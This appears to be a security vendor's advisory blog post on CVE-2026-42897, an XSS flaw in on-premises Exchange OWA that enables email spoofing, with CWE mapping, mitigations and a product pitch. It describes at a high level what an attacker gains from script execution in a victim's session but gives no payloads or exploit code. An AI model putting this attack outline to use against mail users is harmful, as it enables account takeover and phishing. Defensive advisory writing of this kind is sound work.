Vulnerability Analysis2026-05-165 min read

Exchange Server XSS-to-Spoofing: CVE-2026-42897 Added to CISA KEV

A cross-site scripting flaw in on-premises Microsoft Exchange Server enables email spoofing via crafted messages. CISA added it to KEV on May 15 with a May 29 federal deadline.

The Vulnerability

On May 15, 2026, CISA added CVE-2026-42897 to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a spoofing bug in on-premises Microsoft Exchange Server stemming from a cross-site scripting (XSS) flaw, carrying a CVSS score of 8.1 (High). Federal agencies must apply mitigations by May 29, 2026.

The attack vector is a crafted email message that, when rendered by Outlook Web Access (OWA), executes attacker-controlled JavaScript in the context of the authenticated user session.

Why Exchange XSS Still Matters

On-premises Exchange Server remains widely deployed in government agencies, healthcare organizations, and financial institutions. Environments where email migration to cloud is slow due to compliance requirements or air-gap policies. These are exactly the environments where XSS-to-session-hijack chains have the highest impact.

An attacker who achieves JavaScript execution in an OWA session can:

  • Read and send email as the victim
  • Access contacts and calendar data
  • Exfiltrate attachments
  • Pivot to other Exchange administrative functions if the victim has elevated privileges

The CWE Mapping

CWE-79 (Cross-site Scripting): The root cause. Input from email message content is rendered without adequate sanitization in the OWA web interface.

CWE-451 (User Interface Misrepresentation of Critical Information): The spoofing component. The XSS payload can modify the displayed sender, subject, and message content, making phishing indistinguishable from legitimate internal mail.

CWE-116 (Improper Encoding or Escaping of Output): The email rendering pipeline does not consistently encode HTML entities in message body content before insertion into the DOM.

Mitigation

  1. Apply the May 2026 Exchange cumulative update immediately.
  2. Restrict OWA access to managed devices and enforce Content Security Policy headers if your Exchange version supports custom headers.
  3. Monitor for anomalous OWA sessions: unusual geographic origins, bulk email access, or mailbox delegation changes are indicators.

How Deva Detects XSS Patterns

Deva taint-mode rules for CWE-79 track data flow from user-controlled input sources (request parameters, message content, form fields) through to output sinks (DOM insertion, template rendering, response bodies). The scanner identifies missing sanitization and encoding at each output point, with rules covering all major web frameworks.

PostShare

Deva Security Team

Threat research, application security analysis, and defensive engineering insights from the DevSecCode team.

Related Articles

Discussion

Loading comments...